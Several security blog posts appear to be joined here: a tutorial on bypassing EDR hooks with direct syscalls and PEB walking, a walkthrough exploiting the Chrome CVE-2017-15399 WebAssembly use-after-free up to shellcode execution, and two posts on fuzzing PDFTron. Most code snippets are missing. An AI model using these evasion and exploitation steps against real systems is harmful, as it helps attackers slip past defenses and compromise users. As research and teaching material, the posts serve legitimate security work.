First of all, let me introduce myself, my name is Omri Baso, I’m 24 years old from Israel and I’m a red teamer and a security researcher, today I will walk you guys through the process of my learning experience about EDRs, and Low-level programming which I have been doing in the last 3 months.

1. Windows API Hooking

One of the major things EDRs are using in order to detect and flag malicious processes on windows, are ntdll.dll API hooking, what does it mean? it means that the injected DLL of the EDR will inject opcodes that will make the program flow of execution be redirected into his own functions, for example when reading a file on windows you will probably use NtReadFile, when your CPU will read the memory of NTDLL.dll and get the NtReadFile function, your CPU will have a little surprise which will tell it to “jump” to another function right as it enters the ntdll original function, then the EDR will analyze what your process is trying to read by inspecting the parameters sent to the NtReadFile function, if valid, the execution flow will go back to the original NtReadFile function.

1.1 Windows API Hooking bypass

First of all, I am sure that there are people smarter than me who invented other techniques, but now I will teach you the one that worked for me.

Direct System Calls:

Direct system calls are basically a way to directly call the windows user-mode APIs using assembly or by accessing a manually loaded ntdll.dll (Manual DLL mapping), In this article, I will NOT be teaching how to manually map a DLL.

The method we are going to use is assembly compiled inside our binary which will act as the windows API.

The windows syscalls are pretty simple, here is a small example of NtCreateFile:

First line: the first line moves into the rax register the syscall number
Second line: moves the rcx register into the r10, since the syscall instruction destroys the rcx register, we use the r10 to save the variables being sent into the syscall function.
Third line: pretty self explanatory, calls the syscall number which is saved at the rax register.
Foruth line: ret, return the execution flow back to the place the syscalls function was called from.

now after we know how to manually invoke system calls, how do we define them in our program? simple, we declare them in a header file.

The example above shows the parameters being passed into the function NtCreateFile when it is called, as you can tell I placed the EXTERN_Csymbol before the function definition in order to tell the linker that the function is found elsewhere.

before compiling our executable we got to make the following steps, right-click on our project and perform the following:

Now enable masm:

Now we must edit our asm Item type to Microsoft Macro Assembler

With all of that out of the way, we include our header file in our main.cpp file and now we can use NtCreateFile directly! amazing, using the action we just did EDRs will not be able to see the actions we do when using the NtCreateFile function we created by using their user-mode hooks!

What if I don’t know how to invoke the NtAPI?

Well… to be honest, I did encounter this, my solution was simple, I did the same thing we just did for NtCreateFile for NtCreateUserProcess — BUT, I hooked the original NtCreateUserProcess using my own hook, and when it was called I redirect the execution flow back to my assembly function with all of the parameters that were generated by CreateProcesW which is pretty well documented and easy to use, therefore I avoided EDRs inspecting what I do when I use the NtCreateUserProcess syscall.

How can I hook APIs myself?

This is pretty simple as well, for that you need to use the following syscalls.

NtReadVirtualMemory, NtWriteVirtualMemory, and NtProtectVirtualMemory, with these syscalls combined we can install hooks into our process silently without the EDR noticing our actions. since I already explained how to Invoke syscalls I will leave you to research a little bit with google on how to identify the right syscall you want to use ;-) — for now, I will just show an example of an x64 bit hook on ntdll.dll!NtReadFile

In the above example we can see the opcodes for mov rax, <Hooking function>; jmp rax.

these opcodes are being written to the start of NtReadFile which means when our program will try to use NtReadFile it will be forced to jump onto our arbitrary function.

It is important to note, since ntdll.dll by default has only read and execute permissions we must also add a write permission to that sections of memory in order to write our hook there.

1.2 Windows API Hooking bypass — making our code portable

In order to maintain our code portable, we must match our code to any Windows OS build… well even though it sounds hard, It is really not that difficult.

In this section, I will show you a POC code to get the Windows OS build number, use that with caution, and improve the code later on after finishing the article and combine everything you learned here(If you finish the article you will have the tools in mind to do so).

The windows build number is stored at the — SOFTWARE\Microsoft\Windows NT\CurrentVersion registry key, using this knowledge we will extract its value from the registry and store it in a static global variable.

after that we need to also create a global static variable that will store the last syscall that was called, this variable will have to be changed each time we call a syscall, this gives us the following code.

In order to dynamically get the syscall number, we need to somehow get it to store itself at the RAX register, for that we will create the following function.

As you can see in the example above, our function has a map dictionary that has a key, value based on the build number, and returns the right syscall number based on the currently running Windows OS build.

But how am I going to store the return value at the RAX dynamically?

Well, usually the return value of every function is stored at the RAX register once it runs, which means if you execute the following assembly code: call GetBuildNumberthe return value of the function will be stored at the RAX register, resulting in our wanted scenario.

BUT wait, it is not that easy, assembly can be annoying sometimes. each time we invoke a function call, from inside another function, the second function will run over the rcx, rdx, r8,r9 registers, resulting in the loss of the parameters that were sent to the first function, therefore we need to store the previous values in the stack, and restore them later on after we finish the GetBuildNumber function, this can be achieved with the following code

As you can see again, we tell the linker that the GetBuildNumber is an external function since it lives within our CPP code.

2. Imported native APIs — PEB and TEB explained.

Well if you think using direct syscalls will solve everything for you, you are a little bit mistaken, EDRs can also see which Native Windows APIs you are using such as GetModuleHandleW, GetProcAddress, and more, In order to overcome this issue we first MUST understand how to use theses functions without using these native APIs directly, here comes to our aid the PEB, the PEB is the Process Environment Block, which is contained inside the TEB, which is the Thread Environment Block, the PEB is always being located at the offset of 0x060 after the TEB (at x64 bit systems).

In the Windows OS, the TEB location is always being stored at the GS register, therefore we can easily find the PEB at the offset location of gs:[60h].

Let us go and follow the following screenshots in order to see in our own eyes how these offsets can be calculated.

this can be inspected using WinDbg using the command dt ntdll!_TEB

As we can see in the following screenshot at the offset of 0x060 we find the PEB structure, going further down our investigation we can find the Ldr in the PEB using the following command dt ntdll!_PEB

In the screenshot above we can see the Ldr is also located at 0x018 offset, the PEB LDR data contains another element that stores information about the loaded DLLs, let’s continue our exploration.

After going down further we see that at the Offset of 0x010 we find the module list (DLL) which will be loaded, using all of that knowledge we can now create a C++ code to get the base address of ntdll WITHOUT using GetModuleHandleW, but first, we must know what we are looking for in that list.

In the screenshot above we can see we are interested in two elements in the _LDR_DATA_TABLE_ENTRY structure, these elements are the BaseDllName, and the DllBase, as we can see the DllBase holds a void Pointer to the Dll base address, and the BaseDllName is a UNICODE_STRING structure, which means in order to read what is in the UNICODE_STRING we will need to access its Buffervalue.

This can also be simply be examined by looking at the UNICODE_STRING typedef at MSDN

Using everything we have learned so far we will create and use the following code in order to obtain a handle on the ntdll — dll.

After we gained a handle on our desired DLL, which is the ntdll.dll we must find the offset of its APIs(NtReadFile and etc.), this can also be achieved by mapping the sections from the DllBase address as an IMAGE, this can be done and achieved using the following code

After we got our functions ready, let’s do a little POC to see that we can actually get a handle on a DLL and find exported functions inside it.

Using the simple program we made above, we can see that we obtained a handle on the ntdll.dll. and found functions inside it successfully!

3. Summing things up

So we learned how to manually get a handle on a loaded module and use its functions, we learned how to hook windows syscalls, and we learned how to actually write our own using assembly.

combining all of our knowledge, we now can practically use everything we want, under the radar, evading the EDR big eyes, even install hooks on ntdll.dll using the PEB without using GetModuleHandleW, and without using any native windows API such as WriteProcessMemory, since we can execute the same actions using our own assembly, I will now leave you guys to modify the hooking code that I showed you before, with our PEB trick that we learned In this article ;-)

And that’s my friends, how I bypassed almost every EDR.

Chrome Exploitation: An old but good case-study

Since the announcement of the @hack event, one of the world’s largest infosec conferences which will start during Riyadh Season, Haboob’s R&D team submitted 3 talks. All of them got accepted.

One topic in particular is of interest for a lot of vulnerability researchers - browsers exploitation in general, and Chrome exploitation in particular. That said, we decided to present a Chrome exploitation talk which focuses on case-studies we’ve been working on. A generation-to-generation compression on the different era’s chrome exploitation has gone through. Throughout our research, we go through multiple components and analyse whether the techniques and concepts to develop exploits on Chrome has changed.

One of the vulnerabilities that we looked into, dates back to 2017. This vulnerability was demonstrated at Pwn2Own, specifically CVE-2017-15399. The bug existed in Chrome version 62.0.3202.62.

That said, let’s start digging into the bug.

But before we actually start, let's have a sneak-peak at the bug! The bug occurred in V8 Webassembly, the submitted POC:

Root Cause Analysis:

Running the POC on the vulnerable V8 engine triggers the crash, we can observe the crash context:

To accurately deduce which function triggered the crash, we print the stack trace at the time of the crash:

We noticed that the last four function calls inside the stack were not part of Chrome or any of its loaded modules.

So far, we can notice two interesting things, first, the instruction that triggered the bug was accessed on an address that is not mapped into the process. Which could mean that its part of JavaScript Ignition Engine. Secondly, the same address that triggered the crash is hardcoded inside of the Opcode itself:

These function calls were made from two RWX pages and got allocated during execution.

Since the POC uses ASM, the V8 compiles the asmJS module into an opcode using AOT (Ahead of Time Compilation) which is used to enhance performance. We notice that there’s hardcoded memory addresses that potentially could be what’s causing the bug.

A Quick Look Into asmJS:

For now, lets focus entirely on asmJS, and on the following snippet from the POC. We change the variables and function names in a way that could help us understand the snippet better:

The code above gets compiled into machine code using V8, its an asmjs which is basically a standard specified to browsers on how asmJS gets parsed.

When V8 parses a module that begins with use asm, it means that the rest of the code should be treated differently and then compiled into WASM (Webassembly Module). The interface for the asmJS function is:

So asmjs code, accepts three arguments:

  • stdlib: The stdlib object should contains references to a number of built-in functions to get used as the runtime.

  • foregien: used for user defined function

  • heap: heap gives you an ArrayBuffer which can be viewed through a number of different lenses, such as Int32Array and Float32Array.

In our POC the stdlib was a typed array function Uint32Array and we created heap memory using WASM memory using the following call:

memory = new WebAssembly.Memory({initial:1});

So, the complete function call should be as the following:

evil_f = module({Uint32Array:Uint32Array},{},memory.buffer);

Now, V8 will compile asmjs module using the hard-codded address of the backing store of JSArrayBuffer for memory.

JSArrayBuffer is std::shared_ptr<>  which is counting  the references but the address it self was already being compiled into an offset inside the machine code generated. So the reference isn't counted when it's a raw pointer access.

Based on wasm specs, when a memory needs to grow, it must detach the previous memory and its backing store and then free the previously allocated memory. memory.grow(1); // std::shared_ptr<BackingStore> and we can see this behaviour in the file src/wasm/wasm-js.cc

Now the HEAP pointer inside the asmjs module is invalid and pointing to a freed allocation, to trigger the access we just need to call the asmjs.

if we look inside DetachWebAssemblyMemoryBuffer we can see how it frees the backing store:

after that, if we call asmjs  module it will trigger the use after free bug.

The following comments should summarize how the use after free occurred:

WebAssemblyMemory

To investigate further into our crash point and attempt to figure out where the hardcoded offset comes from, we tracked down the creation of WasmMemoryObject JSObject that got created in WebAssemblyMemory. Which is a C function that got called from the following javascript line.

evil_f = module({Uint32Array:Uint32Array},{},memory.buffer); // we save a hardcode address to it

We set a break point at NewArrayBuffer  which will call ShellArrayBufferAllocator::Allocate, this trace step was necessary to catch the initial created memory buffer (0x11CF0000h), afterwards we set a break on access on it (ba r1 11CF0000h) to catch any accessing attempt that will let us observe the crashing point before the use after free bug occurs.

After our on access break point was triggered, we inspected the assembly instructions around the break point. Which turned out to be the generated assembly instructions for the Asmjs f1 function in our original POC. We can see that it got compiled with Range checks to eliminate out of bounds accesses. We also noticed that the Initial memory allocation was hardcoded in the Opcode.

Executing memory.grow() will free the memory buffer but since it’s address was hardcoded inside the asmjs compiled function (dangling pointer), a use after free bug will occur. Chrome devs did not implement  a proper check in the grow process for WasmMemoryObject, They only implemented a check for WasmInstance object and since in our case is asmjs, our object was not treated as WasmInstance object and therefore did not go through the grow checks.

Now we have a clear UAF bug and we'll try to utilize it.

Exploitation

Since the UAF bug allocated memory falls under old space, we needed a way to control that memory region. As this is our first time exploiting such a bug, we found a lot of similarities between Adobe and Chrome in terms of exploiting concepts. But this was not an easy task since that memory management is totally different, and we had to dig deeper into the V8 engine and understand many things like JsObject anatomy for example. The plan was layout on the assumption that if we created another Wasm Instance and hijack it later for code execution is gonna work, so our plan was like the following:

  • Triggering UAF Bug.

  • Heap Spray and reclaim the freed address.

  • Smash & Find Controlled Array.

  • Achieve Read & Write Primitives.

  • Achieve Code Execution.

Triggering UAF Bug:

Triggering the bug by calling memory function Grow() for the buffer to be freed. Doing so results with the freed memory region falling under old space, this step is important to reclaim the memory and control the bug. We allocated a decent size for WasmMemory to make sure that the v8 heap will not be fragmented

Heap Spray:

Thanks to our long journey of controlling Adobe bugs, this step was easy to accomplish but the only difference is we don't require poking holes into our spray anymore, since the goal is reclaiming memory. Using JsArray and JSArrayBuffer  to spray the heap for achieving both Addrof and RW primitive later on.

Smash & Find:

In order to read forward from the initial controlled UAF memory, we first need a way to corrupt the size of our JsArrayBuffer to something huge. With the help of asmjs we can corrupt them and make a lookup function for that corrupted JsArrayBuffer index, and since we filled our spray with the number ‘4’ then it will act as our magic to search for in the  asmjs. Writing an asmjs code is really hectic because of pointer addressing but once you get used to it, it will be easy.

We implemented a lookup function to search for a magic values in the heap:

A simple lookup implementation in JS could look like this, where we are looking for the corrupted array with value 0x56565656 in our spray arrays:

Now that we have an offset to an array that can be used to store JSObjects, we can achieve addrof primitive using the asmjs AddrOf function and use it to leak the address of JSObjects to help us achieve code execution. Please consider that you may need to dig a bit deeper into an object's anatomy to understand what you really need to leak.

We implemented our addrof primitive using the following wrappers:

Achieving Read & Write Primitives:

We are missing one more thing to complete our rocket, which is RW primitives and what we really want is corrupting JsArrayBuffer’s length to give us a forward access to the memory. Since the second DWORD of JsArrayBuffer header contains the length we searched for our size (0x40) and corrupted its length with a bigger size.

Achieving Code Execution:

At last, the final stage of the launch requires two more components. First component is as an asmjs function to overwrite any provided offset and this will help us achieve a primitive write by changing the JsArrayBuffer backing store pointer to an executable memory page:

The second is a wasm instance to allocate PAGE_EXECUTE_READWRITE in v8 to be hijacked by us. A simple definition could look like this:

Putting things together with a simple calc.exe shellcode:

That’s everything, we started with a simple PoC and ended up with achieving code execution :D

Hope you enjoyed reading this post :) See you in @Hack!

Applying Fuzzing Techniques Against PDFTron: Part </a#x3E;2

Introduction

In our first blog we covered the basics of how we fuzzed PDFtron using python. The results were quite interesting and yielded multiple vulnerabilities. Even with the number of the vulnerabilities we found, we were not fully satisfied. We eventually decided to take it a touch further by utilizing LibFuzzer against PDFTron.

Throughout this blog post, we will attempt to document our short journey with LibFuzzer, the successes and failures. Buckle up, here we go..

Overview

LibFuzzer is part of the LLVM package. It allows you to integrate the coverage-guided fuzzer logic into your harness. A crucial feature of LibFuzzer is its close integration with Sanitizer Coverage and bug detecting sanitizers, namely: Address Sanitizer (ASAN), Leak Sanitizer, Memory Sanitizer (MSAN), Thread Sanitizer (TSAN) and Undefined Behaviour Sanitizer (UBSAN).

The first step into integrating LibFuzzer in your project is to implement a fuzz target function – which is a function that accepts an array of bytes that will be mutated by LibFuzzer’s function (LLVMFuzzerTestOneInput):

When we integrate a harness with the function provided by LibFuzzer (LLVMFuzzerTestOneInput()), which is Libfuzzer's entry point, we can observe how LibFuzzer works internally.

Recent versions of Clang (starting from 6.0) includes LibFuzzer without having to install any dependencies. To build your harness with the integrated LibFuzzer function, use the -fsanitize=fuzzer flag during the compilation and linking. In some cases, you might want to combine LibFuzzer with AddressSanitizer (ASAN), UndefinedBehaviorSanitizer (UBSAN), or both. You can also build it with MemorySanitizer (MSAN):

In our short research, we used more options to build our harness since we targeted PDFTron, specifically to satisfy dependencies (header files etc..)

To properly benchmark our results, we decided to build the harness on both Linux and Windows.

Libfuzzer on Windows

To compile the harness, first, we need to download the LLMV package which contains the Clang compiler. To acquire a LLVM package, you can download it from the LLVM Snapshot Builds page (Windows).

Building the Harness - Windows:

To get accurate results and make the comparison fair, we targeted the same feature(s) we fuzzed during part1 (ImageExtract), which can be downloaded from here. PDFTron provides multiple implementations of their features in various programming languages, we went with the C++ implementation since our harness was developed in the same language.

When reviewing the source code sample for ImageExtract, we found the PDFDoc constructor, which by default takes the path for the PDF file we want to extract the images from. This constructor works perfectly in our custom fuzzer since our custom fuzzer was a file-based fuzzer. However, LibFuzzer is completely different since it’s an in-memory based fuzzer and it provides mutated test cases in-memory through LLVMFuzzerTestOneInput.

If PDFTron’s implementation of ImageExtract had only the option to extract an image from a PDF file in disk, we can easily workaround this constraint by using a simple trick:

dumping the test cases that LibFuzzer generated into the disk then pass it to the PDFDoc constructor.

Using this technique will reduce the overall performance of the fuzzer. You will always want to avoid using files and I/O operations as they’re the slowest. So, using such workarounds should always be a last resort.

In our search for an alternative solution (since I/O operations are lava!) we inspected the source code of the ImageExtract feature and in one of its headers we found multiple implementations for the PDFDoc constructor. One of the implementations was so perfect for us, we thought it was custom-made for our project.

The constructor accepts a buffer and its size (which will be provided by LibFuzzer). So, now we can use the new constructor in our harness without any performance penalties and minimal changes to our code.

Now all we have to do is change ImageExtract sample source code main function from accepting one argument (file path) to two arguments (buffer and size) then add the entry point function for LibFuzzer.

At this point our harness is primed and ready to be built.

Compiling and Running the Harness - Windows

Before compiling our harness, we need to provide the static library that PDFTron uses. We also need to provide PDFTron’s headers path to Clang so we can compile our harness without any issues. The options are:

  • -L : Add directory to library search path

  • -l : Name of the library

  • -I : Add directory to include search path.

The last option that we need to add is the harness fsanitize=fuzzer to enable fuzzing in our harness.

To run the harness, we need to provide the corpus folder that contains the initial test-cases that we want LibFuzzer to start mutating.

We tested the fsanitize=fuzzer,address (Address Sanitizer) option to see if our fuzzer would yield more crashes, but we realized that address sanitization was not behaving as it should under Windows. We ended up running our harness without the address sanitizer. We managed to trigger the same crashes we previously found using our custom fuzzer (part 1).

LibFuzzer on Linux

Since PDFTron also supports Linux, we decided to test run LibFuzzer on Linux so we can run our harness with the Address Sanitizer option enabled. We also targeted the same feature (ImageExtract) to avoid making any major changes. The only significant changes were the options provided during the build time.

Compiling and Running the Harness - Linux

The options that we used to compile the harness on Linux are pretty much the same as on Windows. We need to provide the headers path and the library PDFTron used:

  • -L : Add directory to library search path

  • -l : Name of the library (without .so and lib suffix)

  • -I : Add directory to the end of the list of include search paths

Now we need to add fuzzer option and the address option as an argument for -fsanitize value to enable fuzzing and the Address Sanitizer:

Our harness is now ready to roll. To keep our harness running, we had to add these two arguments on Linux:

  • -fork=1

  • -ignore_crashes=1

The -fork option allows us to spawn a concurrent child and provides it with a small random subset of the corpus.

The -ignore_crashes options allows Libfuzzer to continue running without exiting when a crash occurs.

After running our harness over a short period of time, we discovered 10 unique crashes in PDFTron.

 

 

Conclusion:

Throughout our small research, we were able to uncover new vulnerabilities along with triggering the old ones we discovered previously.

Sadly, LibFuzzer under Windows does not seem to be fully mature yet to be used against targets like PDFTron. Nevertheless, using LibFuzzer on Linux was easy and stable.

 

Hope you enjoyed the short journey, until next time!

Happy hunting!

Resource

Applying Fuzzing Techniques Against PDFTron: Part 1

Introduction:

PDFTron SDK brings a wide variety of PDF parsing functionalities. It varies from reading and viewing PDF files to converting PDF files to different file formats. The provided SDK is widely used and supports multiple platforms, it also exposes a rich set of APIs that helps in automating PDFTron functionalities.

PDFtron was one of the targets we started looking into since we decided to investigate PDF readers and PDF convertors. Throughout this blog post, we will discuss the brief research that we did.

The blog will discuss our efforts which will break down the harnessing and fuzzing of different PDFTron functionalities.

How to Tackle the Beast: CLI vs Harnessing:

Since PDFTron provides well documented CLI’s, it was the obvious route for us to go, we considered this as a low-hanging fruit. Our initial thinking was to pick a command, try to craft random PDF files and feed them to the specific CLI, such as pdf2image. We were able to get some crashes this way, we thought it can’t get any better, right? Right???

But after a while, we wanted to take our project a step further, by developing a costume harness using their publicly available SDK.

Lucky enough, we found a great deal of projects on their website which includes small programs that were developed in C++, just ripe and ready to be compiled and executed. Each program does a very specific function, such as adding an image to a PDF file, extracting an image from a PDF file, etc.

We could easily integrate those code snippets into our project, feed them mutated inputs and monitor their execution.

For example, we harnessed the extract image functionality, but also we did minor modifications to the code by making it take two arguments:

1. The mutated file path.

2. Destination to where we want the image to be extracted.

 

 Following are the edited parts of PDFTron’s code:

How Does our Fuzzer Work?

We developed our own custom fuzzer that uses Radamsa as a mutator, then feed the harness the mutated files while monitoring the execution flow of the program. If and when any crash occurs, the harness will log all relative information such as the call stack and the registers state.

What makes our fuzzer generic, is that we made a config file in JSON format, that we specify as the following:

1- Mutation file format.

2- Harness path.

3- Test-cases folder path.

4- Output folder path.

5- Mutation tool path.

6- Hashes file path.

We fill these fields in based on our targeted application, so we don’t have to change our fuzzer source code for each different target.

The Components:

We divided the fuzzer into various components, each component has a specific functionality, the components of our fuzzer were:

A. Test Case Generator: Handled by Radamsa.

B. Execution Monitor: Handled by PyKd.

C. Logger: Costume built logger.

D. Duplicate Handler: Handled by !exploitable Toolkit.

We will go over each component and our way of implementing it in details in the next section.

A. Test Case Generator:

As mentioned before, we used Radamsa as our test case generator (mutation-based), so we integrated it with our fuzzer mainly due to it supporting a lot of mutation types, which saves plenty of time on reimplementing and optimizing some mutation types.

we also listed some of the mutation types that Radamsa supports and stored it in a list to get a random mutation type each time.

After generating the list, we need to place Radamsa’s full command to start generating the test cases after specifying all the arguments needed:

Now we got the test cases at the desired destination folder, each time we execute this function Radamsa generates 20 mutated files which later will be fed to the targeted application.

B. Execution Monitor:

This part is considered as the main component in our fuzzer, it contains three main stages:

1. Test case running stage.

2. Program execution stage.

3. Logging stage. 

After we prepared the mutated files, we can now test them on the selected target. In our fuzzer, we used PyKd library to execute and check the harness’ execution progress. If the harness terminates the execution normally, our fuzzer will test the next mutated file, and if our harness terminates the execution due to access valuation our fuzzer will deal with it (more details on this later).

PyKd will run the harness and will use the expHandler variable to check the status of the harness execution. The fuzzer will decide whether a crash happened to the harness or not. We create a class called ExceptionHandler which monitors the execution flow of our harness, it checks exception flag, if the value is 0xC0000005, its usually a promising bug.

If accessViolationOccured was set to true, our fuzzer will save the mutated file for us to analyze it later,  if it was set to false, that means the mutated file did not affect the harness execution and our harness will test another file.

C. Logging:

This component is crucial in any fuzzing framework. The role of the logger is to log a file that briefly details the crash and saves the mutated file that triggered the crash. Some important details you might want to include in a log:

- Assembly instruction before the crash. 

- Assembly instruction where the crash occurred.

- Registries states.

- Call stack.

After fetching all information we need from the crash, now we can write it into a log file. To avoid naming duplication problems, we saved both the test case that triggered the crash and the log file with the epoch time as their file names.

This code snippet saves the PoC that triggered the crash and creates a log file related to the crash in our disk for later analysis.

 

D. Duplicate Handler:

After running the fuzzer over long periods of time, we found that the same crash may occur multiple times, and it will be logged each time it happens. Making it harder for us to analyse unique crashes.  To control duplicate crashes, we used “MSEC.dll”, which is created by the Microsoft Security Engineering Center (MSEC). 

We first need to load the DLL to WinDbg.

Then we used a tool called “!exploitable”, this tool will generate a unique hash for each crash along with crash analysis and risk assessment. Each time the program crashes, we will run this tool to get the hash of the crash and compare it to the hashes we already got before. If it matches one of the hashes, we will not save a log for this crash. If it’s a unique hash, we will store the new hash with previous crash hashes we discovered before and save a log file for the new crash with it’s test case.

In the second part of this blogpost, we will discuss integrating the harness with a publicly available fuzzer and comparing the results between these two different approaches.


Stay tuned, and as always, happy hunting!







❌